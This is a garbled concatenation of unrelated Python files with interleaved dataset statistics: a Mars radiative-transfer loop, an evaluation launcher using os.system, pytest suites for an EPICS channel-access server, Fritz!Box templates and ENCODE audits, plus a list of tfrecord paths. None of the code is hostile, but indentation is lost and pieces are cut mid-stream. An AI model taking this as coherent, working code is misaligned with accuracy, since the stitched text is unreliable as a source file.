dusttauvalue_list=np.array([0.1, 1., 10.]) #list of total dust optical depths (500 nm)
cloudpositionslabel_list=np.array(['0.5', '20.5', '40.5']) #list of cloud altitudes (km)
cloudindexvalue_list=np.array([63, 43, 23]) #indices corresponding to those cloud altitudes
for ind_dust in range(0, len(dusttaulabel_list)):
for ind_cloud in range(0, len(cloudpositionslabel_list)):
dusttaulabel=dusttaulabel_list[ind_dust]
dusttauvalue=dusttauvalue_list[ind_dust]
cloudpositionslabel=cloudpositionslabel_list[ind_cloud]
cloudindexvalue=cloudindexvalue_list[ind_cloud]
rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel='colddrymars_0.02bar_250K', outputfilelabel='z=0_A=desert_noTD_DS_dustod='+dusttaulabel+'_co2cloudod=100_z='+cloudpositionslabel+'_reff=10', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=True, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includeh2ocloud=False,includeco2cloud=True,co2cloudlayerinds=np.array([cloudindexvalue]), co2cloudlayerods=np.array([100.]),co2iceparamsfile='cloud_co2_reff10_vareff0p1_lognormal.pickle', includedust=True,tau_d=dusttauvalue,dustparamsfile='dust_wolff_pangajello_reff1p5_vareff0p5_lognormal.pickle')
| 90.77095
| 797
| 0.730244
| 2,070
| 16,248
| 5.456522
| 0.11256
| 0.029748
| 0.02479
| 0.042851
| 0.845064
| 0.779371
| 0.772466
| 0.753431
| 0.745374
| 0.726605
| 0
| 0.081209
| 0.053422
| 16,248
| 178
| 798
| 91.280899
| 0.653186
| 0.186915
| 0
| 0.571429
| 1
| 0
| 0.340792
| 0.306487
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.042857
| 0
| 0.042857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eb8846485d7496b50877c22a79df52aca65d4286
| 580
|
py
|
Python
|
eval_covid20cases_timm-regnetx_002_ElasticTransform.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_covid20cases_timm-regnetx_002_ElasticTransform.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_covid20cases_timm-regnetx_002_ElasticTransform.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
import os
ls=["python main.py --configs configs/eval_covid20cases_unetplusplus_timm-regnetx_002_0_ElasticTransform.yml",
"python main.py --configs configs/eval_covid20cases_unetplusplus_timm-regnetx_002_1_ElasticTransform.yml",
"python main.py --configs configs/eval_covid20cases_unetplusplus_timm-regnetx_002_2_ElasticTransform.yml",
"python main.py --configs configs/eval_covid20cases_unetplusplus_timm-regnetx_002_3_ElasticTransform.yml",
"python main.py --configs configs/eval_covid20cases_unetplusplus_timm-regnetx_002_4_ElasticTransform.yml",
]
for l in ls:
os.system(l)
| 52.727273
| 110
| 0.856897
| 80
| 580
| 5.8375
| 0.3
| 0.107066
| 0.12848
| 0.203426
| 0.890792
| 0.890792
| 0.890792
| 0.890792
| 0.890792
| 0.890792
| 0
| 0.054645
| 0.053448
| 580
| 11
| 111
| 52.727273
| 0.795993
| 0
| 0
| 0
| 0
| 0
| 0.886403
| 0.671256
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
eba33faac807b8deddf2ba0e0ac4c8fe96fbf9a6
| 5,345
|
py
|
Python
|
tests/test_handler.py
|
delta-accelerator/channel_access.server
|
21a7707da1f3421ed38773095e577f48b798daac
|
[
"MIT"
] | null | null | null |
tests/test_handler.py
|
delta-accelerator/channel_access.server
|
21a7707da1f3421ed38773095e577f48b798daac
|
[
"MIT"
] | null | null | null |
tests/test_handler.py
|
delta-accelerator/channel_access.server
|
21a7707da1f3421ed38773095e577f48b798daac
|
[
"MIT"
] | null | null | null |
import pytest
import threading
import channel_access.common as ca
import channel_access.server as cas
from . import common
def test_write_handler(server):
executed = False
def handler(pv, value, timestamp, context):
nonlocal executed
executed = True
return (value, timestamp)
pv = server.createPV('CAS:Test', ca.Type.CHAR, write_handler=handler)
common.caput('CAS:Test', 1)
assert(executed)
assert(pv.value == 1)
def test_noop_write_handler(server):
executed = False
def handler(pv, value, timestamp, context):
nonlocal executed
executed = True
return True
pv = server.createPV('CAS:Test', ca.Type.CHAR, write_handler=handler)
common.caput('CAS:Test', 1)
assert(executed)
assert(pv.value == 1)
def test_changing_write_handler(server):
executed = False
def handler(pv, value, timestamp, context):
nonlocal executed
executed = True
return (value + 1, timestamp)
pv = server.createPV('CAS:Test', ca.Type.CHAR, write_handler=handler)
common.caput('CAS:Test', 1)
assert(executed)
assert(pv.value == 2)
def test_failing_write_handler(server):
pv = server.createPV('CAS:Test', ca.Type.CHAR, write_handler=cas.failing_write_handler)
with pytest.raises(common.CaputError):
common.caput('CAS:Test', 1)
def test_async_write_handler(server):
executed = False
completion = None
args = None
def handler(pv, value, timestamp, context):
nonlocal executed, completion, args
executed = True
completion = cas.AsyncWrite(pv, context)
args = (value, timestamp)
return completion
def complete():
nonlocal completion, args
completion.complete(*args)
pv = server.createPV('CAS:Test', ca.Type.CHAR, write_handler=handler)
timer = threading.Timer(1.0, complete)
timer.start()
common.caput('CAS:Test', 1, timeout=2)
assert(executed)
timer.join()
assert(pv.value == 1)
def test_failing_async_write_handler(server):
executed = False
completion = None
def handler(pv, value, timestamp, context):
nonlocal executed, completion
executed = True
completion = cas.AsyncWrite(pv, context)
return completion
def complete():
nonlocal completion
completion.fail()
pv = server.createPV('CAS:Test', ca.Type.CHAR, write_handler=handler)
timer = threading.Timer(1.0, complete)
timer.start()
with pytest.raises(common.CaputError):
common.caput('CAS:Test', 1, timeout=2)
assert(executed)
timer.join()
assert(pv.value == 0)
def test_read_handler(server):
executed = False
def handler(pv, context):
nonlocal executed
executed = True
return pv.attributes
pv = server.createPV('CAS:Test', ca.Type.CHAR, read_handler=handler, attributes={
'value': 1
})
value = int(common.caget('CAS:Test'))
assert(executed)
assert(value == 1)
def test_noop_read_handler(server):
executed = False
def handler(pv, context):
nonlocal executed
executed = True
return True
pv = server.createPV('CAS:Test', ca.Type.CHAR, read_handler=handler, attributes={
'value': 1
})
value = int(common.caget('CAS:Test'))
assert(executed)
assert(value == 1)
def test_changing_read_handler(server):
executed = False
def handler(pv, context):
nonlocal executed
executed = True
attr = pv.attributes
attr.update({ 'value': 2 })
return attr
pv = server.createPV('CAS:Test', ca.Type.CHAR, read_handler=handler, attributes={
'value': 1
})
value = int(common.caget('CAS:Test'))
assert(executed)
assert(value == 2)
def test_failing_read_handler(server):
executed = False
def handler(pv, context):
nonlocal executed
executed = True
return False
pv = server.createPV('CAS:Test', ca.Type.CHAR, read_handler=handler, attributes={
'value': 1
})
with pytest.raises(common.CagetError):
common.caget('CAS:Test')
assert(executed)
def test_async_read_handler(server):
executed = False
completion = None
def handler(pv, context):
nonlocal executed, completion
executed = True
completion = cas.AsyncRead(pv, context)
return completion
def complete():
nonlocal completion
completion.complete({'value': 1})
pv = server.createPV('CAS:Test', ca.Type.CHAR, read_handler=handler)
timer = threading.Timer(1.0, complete)
timer.start()
common.caget('CAS:Test', timeout=2)
assert(executed)
timer.join()
assert(pv.value == 1)
def test_failing_async_read_handler(server):
executed = False
completion = None
def handler(pv, context):
nonlocal executed, completion
executed = True
completion = cas.AsyncRead(pv, context)
return completion
def complete():
nonlocal completion
completion.fail()
pv = server.createPV('CAS:Test', ca.Type.CHAR, read_handler=handler)
timer = threading.Timer(1.0, complete)
timer.start()
with pytest.raises(common.CagetError):
common.caget('CAS:Test', timeout=2)
assert(executed)
timer.join()
| 26.859296
| 91
| 0.647521
| 640
| 5,345
| 5.326563
| 0.089063
| 0.049281
| 0.056322
| 0.066882
| 0.912878
| 0.897037
| 0.87973
| 0.86389
| 0.840422
| 0.812262
| 0
| 0.008376
| 0.240599
| 5,345
| 198
| 92
| 26.994949
| 0.831486
| 0
| 0
| 0.786585
| 0
| 0
| 0.041534
| 0
| 0
| 0
| 0
| 0
| 0.121951
| 1
| 0.164634
| false
| 0
| 0.030488
| 0
| 0.262195
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ccd97ab53b81dc4d98a325c48720219d74417d70
| 6,834
|
py
|
Python
|
tests/test_fritzhometemplate.py
|
mib1185/python-fritzhome
|
c0017738b365b4dea5a54d01add66fd606229cd2
|
[
"MIT"
] | 33
|
2017-10-25T20:13:35.000Z
|
2022-03-27T09:21:19.000Z
|
tests/test_fritzhometemplate.py
|
mib1185/python-fritzhome
|
c0017738b365b4dea5a54d01add66fd606229cd2
|
[
"MIT"
] | 49
|
2017-11-05T05:52:45.000Z
|
2022-03-27T09:21:04.000Z
|
tests/test_fritzhometemplate.py
|
mib1185/python-fritzhome
|
c0017738b365b4dea5a54d01add66fd606229cd2
|
[
"MIT"
] | 33
|
2018-05-05T21:52:08.000Z
|
2022-03-27T08:24:00.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from nose.tools import eq_, assert_true, assert_false
from unittest.mock import MagicMock
from .helper import Helper
from pyfritzhome import Fritzhome
class TestFritzhomeTemplate(object):
def setup(self):
self.mock = MagicMock()
self.fritz = Fritzhome("10.0.0.1", "user", "pass")
self.fritz._request = self.mock
self.fritz._devices = {}
self.mock.side_effect = [Helper.response("templates/template_list")]
self.fritz.update_templates()
def test_template_init(self):
template = self.fritz.get_template_by_ain("tmp0B32F7-1B0650682")
eq_(template.ain, "tmp0B32F7-1B0650682")
eq_(template._functionsbitmask, 320)
assert_false(template.apply_hkr_summer)
assert_false(template.apply_hkr_temperature)
assert_false(template.apply_hkr_holidays)
assert_false(template.apply_hkr_time_table)
assert_false(template.apply_relay_manual)
assert_false(template.apply_relay_automatic)
assert_false(template.apply_level)
assert_false(template.apply_color)
assert_false(template.apply_dialhelper)
def test_template_with_single_device(self):
template = self.fritz.get_template_by_ain("tmp0B32F7-1B0650234")
eq_(template.devices, ["08735 0525249"])
def test_template_with_multiple_devices(self):
template = self.fritz.get_template_by_ain("tmp0B32F7-1C40A2B8A")
expected_devices = set(["08735 0525249",
"08735 0525249",
"08735 0340143",
"08735 0526125"])
eq_(len(expected_devices.intersection(template.devices)), len(expected_devices))
def test_template_applies_hkr_summer(self):
template = self.fritz.get_template_by_ain("tmp0B32F7-1B064FA20")
assert_true(template.apply_hkr_summer)
assert_false(template.apply_hkr_temperature)
assert_false(template.apply_hkr_holidays)
assert_false(template.apply_hkr_time_table)
assert_false(template.apply_relay_manual)
assert_false(template.apply_relay_automatic)
assert_false(template.apply_level)
assert_false(template.apply_color)
assert_false(template.apply_dialhelper)
def test_template_applies_hkr_temperature(self):
template = self.fritz.get_template_by_ain("tmp0B32F7-1B064FA21")
assert_false(template.apply_hkr_summer)
assert_true(template.apply_hkr_temperature)
assert_false(template.apply_hkr_holidays)
assert_false(template.apply_hkr_time_table)
assert_false(template.apply_relay_manual)
assert_false(template.apply_relay_automatic)
assert_false(template.apply_level)
assert_false(template.apply_color)
assert_false(template.apply_dialhelper)
def test_template_applies_hkr_holidays(self):
template = self.fritz.get_template_by_ain("tmp0B32F7-1B064FA22")
assert_false(template.apply_hkr_summer)
assert_false(template.apply_hkr_temperature)
assert_true(template.apply_hkr_holidays)
assert_false(template.apply_hkr_time_table)
assert_false(template.apply_relay_manual)
assert_false(template.apply_relay_automatic)
assert_false(template.apply_level)
assert_false(template.apply_color)
assert_false(template.apply_dialhelper)
def test_template_applies_hkr_time_table(self):
template = self.fritz.get_template_by_ain("tmp0B32F7-1B064FA23")
assert_false(template.apply_hkr_summer)
assert_false(template.apply_hkr_temperature)
assert_false(template.apply_hkr_holidays)
assert_true(template.apply_hkr_time_table)
assert_false(template.apply_relay_manual)
assert_false(template.apply_relay_automatic)
assert_false(template.apply_level)
assert_false(template.apply_color)
assert_false(template.apply_dialhelper)
def test_template_applies_relay_manual(self):
template = self.fritz.get_template_by_ain("tmp0B32F7-1B064FA24")
assert_false(template.apply_hkr_summer)
assert_false(template.apply_hkr_temperature)
assert_false(template.apply_hkr_holidays)
assert_false(template.apply_hkr_time_table)
assert_true(template.apply_relay_manual)
assert_false(template.apply_relay_automatic)
assert_false(template.apply_level)
assert_false(template.apply_color)
assert_false(template.apply_dialhelper)
def test_template_applies_relay_automatic(self):
template = self.fritz.get_template_by_ain("tmp0B32F7-1B064FA25")
assert_false(template.apply_hkr_summer)
assert_false(template.apply_hkr_temperature)
assert_false(template.apply_hkr_holidays)
assert_false(template.apply_hkr_time_table)
assert_false(template.apply_relay_manual)
assert_true(template.apply_relay_automatic)
assert_false(template.apply_level)
assert_false(template.apply_color)
assert_false(template.apply_dialhelper)
def test_template_applies_level(self):
template = self.fritz.get_template_by_ain("tmp0B32F7-1B064FA26")
assert_false(template.apply_hkr_summer)
assert_false(template.apply_hkr_temperature)
assert_false(template.apply_hkr_holidays)
assert_false(template.apply_hkr_time_table)
assert_false(template.apply_relay_manual)
assert_false(template.apply_relay_automatic)
assert_true(template.apply_level)
assert_false(template.apply_color)
assert_false(template.apply_dialhelper)
def test_template_applies_color(self):
template = self.fritz.get_template_by_ain("tmp0B32F7-1B064FA27")
assert_false(template.apply_hkr_summer)
assert_false(template.apply_hkr_temperature)
assert_false(template.apply_hkr_holidays)
assert_false(template.apply_hkr_time_table)
assert_false(template.apply_relay_manual)
assert_false(template.apply_relay_automatic)
assert_false(template.apply_level)
assert_true(template.apply_color)
assert_false(template.apply_dialhelper)
def test_template_applies_dialhelper(self):
template = self.fritz.get_template_by_ain("tmp0B32F7-1B064FA28")
assert_false(template.apply_hkr_summer)
assert_false(template.apply_hkr_temperature)
assert_false(template.apply_hkr_holidays)
assert_false(template.apply_hkr_time_table)
assert_false(template.apply_relay_manual)
assert_false(template.apply_relay_automatic)
assert_false(template.apply_level)
assert_false(template.apply_color)
assert_true(template.apply_dialhelper)
| 40.678571
| 88
| 0.734416
| 811
| 6,834
| 5.762022
| 0.108508
| 0.250374
| 0.329339
| 0.416007
| 0.826664
| 0.804194
| 0.804194
| 0.795848
| 0.795848
| 0.677723
| 0
| 0.036856
| 0.190079
| 6,834
| 167
| 89
| 40.922156
| 0.807407
| 0.006146
| 0
| 0.604478
| 0
| 0
| 0.051694
| 0.003387
| 0
| 0
| 0
| 0
| 0.679104
| 1
| 0.097015
| false
| 0.007463
| 0.029851
| 0
| 0.134328
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
ccdde8ac40fc96cfc99a746ebf4348c6e42984e0
| 2,496
|
py
|
Python
|
src/encoded/tests/test_audit_replicate.py
|
procha2/encoded
|
e9f122362b71f3b8641023b8d2d5ad531d3484b7
|
[
"MIT"
] | 102
|
2015-05-20T01:17:43.000Z
|
2022-03-07T06:03:55.000Z
|
src/encoded/tests/test_audit_replicate.py
|
procha2/encoded
|
e9f122362b71f3b8641023b8d2d5ad531d3484b7
|
[
"MIT"
] | 901
|
2015-01-07T23:11:57.000Z
|
2022-03-18T13:56:12.000Z
|
src/encoded/tests/test_audit_replicate.py
|
procha2/encoded
|
e9f122362b71f3b8641023b8d2d5ad531d3484b7
|
[
"MIT"
] | 65
|
2015-02-06T23:00:26.000Z
|
2022-01-22T07:58:44.000Z
|
import pytest
def test_audit_status_replicate(testapp, rep1):
res = testapp.get(rep1['@id'] + '@@index-data')
errors = res.json['audit']
errors_list = []
for error_type in errors:
errors_list.extend(errors[error_type])
assert any(error['category'] == 'mismatched status' for error in errors_list)
def test_audit_inconsistent_modification_tag(
testapp, rep1,
experiment, antibody_lot, target_H3K27ac,
target, base_biosample, construct_genetic_modification,
library_1):
testapp.patch_json(experiment['@id'], {'assay_term_name': 'ChIP-seq',
'target': target_H3K27ac['@id']})
testapp.put_json(target['@id'], {'investigated_as': ['synthetic tag'],
'label': 'FLAG'})
testapp.patch_json(rep1['@id'], {'antibody': antibody_lot['@id'],
'library': library_1['@id']})
testapp.patch_json(base_biosample['@id'], {
'genetic_modifications': [construct_genetic_modification['@id']]})
res = testapp.get(rep1['@id'] + '@@index-data')
errors = res.json['audit']
errors_list = []
for error_type in errors:
errors_list.extend(errors[error_type])
assert any(error['category'] == 'inconsistent modification tag' for error in errors_list)
def test_audit_consistent_modification_tag(
testapp, rep1,
experiment, antibody_lot,
target, base_biosample, construct_genetic_modification,
library_1):
testapp.patch_json(experiment['@id'], {'assay_term_name': 'ChIP-seq',
'target': target['@id']})
testapp.put_json(target['@id'], {'investigated_as': ['synthetic tag'],
'label': 'FLAG'})
testapp.patch_json(rep1['@id'], {'antibody': antibody_lot['@id'],
'library': library_1['@id']})
testapp.patch_json(construct_genetic_modification['@id'],
{'introduced_tags': [{'name': 'FLAG', 'location': 'C-terminal'}]})
testapp.patch_json(base_biosample['@id'], {
'genetic_modifications': [construct_genetic_modification['@id']]})
res = testapp.get(rep1['@id'] + '@@index-data')
errors = res.json['audit']
errors_list = []
for error_type in errors:
errors_list.extend(errors[error_type])
assert all(error['category'] != 'inconsistent modification tag' for error in errors_list)
| 44.571429
| 93
| 0.604968
| 269
| 2,496
| 5.360595
| 0.223048
| 0.062413
| 0.07767
| 0.035368
| 0.879334
| 0.879334
| 0.879334
| 0.879334
| 0.779473
| 0.779473
| 0
| 0.009559
| 0.245593
| 2,496
| 55
| 94
| 45.381818
| 0.75624
| 0
| 0
| 0.729167
| 0
| 0
| 0.182292
| 0.016827
| 0
| 0
| 0
| 0
| 0.0625
| 1
| 0.0625
| false
| 0
| 0.020833
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
15ce56f0be7b921cd2969b5a04f6078306327267
| 249
|
py
|
Python
|
ML_utils/__init__.py
|
MaximeRedstone/UnstructuredCAE-DA
|
b54bd53540c11aa1b70e5160751905141f463217
|
[
"MIT"
] | null | null | null |
ML_utils/__init__.py
|
MaximeRedstone/UnstructuredCAE-DA
|
b54bd53540c11aa1b70e5160751905141f463217
|
[
"MIT"
] | null | null | null |
ML_utils/__init__.py
|
MaximeRedstone/UnstructuredCAE-DA
|
b54bd53540c11aa1b70e5160751905141f463217
|
[
"MIT"
] | null | null | null |
from UnstructuredCAEDA.ML_utils.helpers import set_seeds, load_AE, get_device
from UnstructuredCAEDA.ML_utils.helpers import load_model_from_settings, load_model_and_settings_from_dir
from UnstructuredCAEDA.ML_utils.convolution import ConvScheduler
| 62.25
| 105
| 0.903614
| 35
| 249
| 6.028571
| 0.514286
| 0.298578
| 0.327014
| 0.398104
| 0.388626
| 0.388626
| 0
| 0
| 0
| 0
| 0
| 0
| 0.060241
| 249
| 3
| 106
| 83
| 0.901709
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c631bc60f5c8e65d2f5a8a93bac9b505c577fa9b
| 14,537
|
py
|
Python
|
scripts/list_tfrecords.py
|
cybertronai/Megatron-LM
|
4c766958a5b41ea1d7e472afa98a0a1a45aed865
|
[
"Apache-2.0"
] | 14
|
2019-04-30T06:11:53.000Z
|
2021-04-16T09:26:48.000Z
|
scripts/list_tfrecords.py
|
cybertronai/Megatron-LM
|
4c766958a5b41ea1d7e472afa98a0a1a45aed865
|
[
"Apache-2.0"
] | null | null | null |
scripts/list_tfrecords.py
|
cybertronai/Megatron-LM
|
4c766958a5b41ea1d7e472afa98a0a1a45aed865
|
[
"Apache-2.0"
] | 5
|
2019-05-05T22:56:11.000Z
|
2021-04-16T09:30:27.000Z
|
#!/usr/bin/env python
# Result is
# /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0000 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0001 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0002 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0003 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0004 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0005 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0006 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0007 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0008 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0009 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00010 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00011 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00012 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00013 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00014 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00015 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00016 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00017 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00018 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00019 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00020 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00021 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00022 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00023 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00024 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00025 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00026 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00027 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00028 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00029 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00030 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00031 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00032 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00033 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00034 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00035 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00036 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00037 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00038 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00039 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00040 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00041 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00042 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00043 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00044 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00045 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00046 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00047 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00048 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00049 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00050 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00051 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00052 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00053 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00054 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00055 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00056 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00057 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00058 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00059 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00060 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00061 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00062 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00063 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00064 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00065 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00066 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00067 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00068 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00069 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00070 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00071 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00072 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00073 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00074 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00075 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00076 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00077 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00078 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00079 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00080 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00081 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00082 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00083 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00084 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00085 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00086 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00087 